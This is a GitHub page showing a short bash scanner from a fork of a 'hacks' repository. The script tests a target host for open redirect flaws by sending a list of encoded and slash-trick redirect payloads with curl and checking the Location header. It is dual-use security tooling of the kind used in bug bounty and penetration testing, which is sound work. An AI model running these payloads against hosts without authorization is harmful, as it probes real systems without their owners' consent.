forked from EdOverflow/hacks
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathopenredirect
executable file
·36 lines (32 loc) · 1.21 KB
/
openredirect
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#!/bin/bash
# Find unauthenticated open redirect vulnerabilities in a target host.
if [[ $1 == "" ]]; then
echo "./openredirect <url>";
exit 1;
fi
payloads=(
'/http://example.com'
'/%5cexample.com'
'/%2f%2fexample.com'
'/example.com/%2f%2e%2e'
'/http:/example.com'
'/?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com'
'/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com'
'/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com'
'/redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com'
'/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com'
'/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com'
'/.example.com'
'///\;@example.com'
'///example.com/'
'///example.com'
'///example.com/%2f..'
'/////example.com/'
'/////example.com'
)
url=${1%/}
for i in "${payloads[@]}"; do
if curl -LIs "$url/$i" | grep -iE '< location: (https?:)?[/\\]{2,}example.com'; then
echo "$url/$i"
fi
done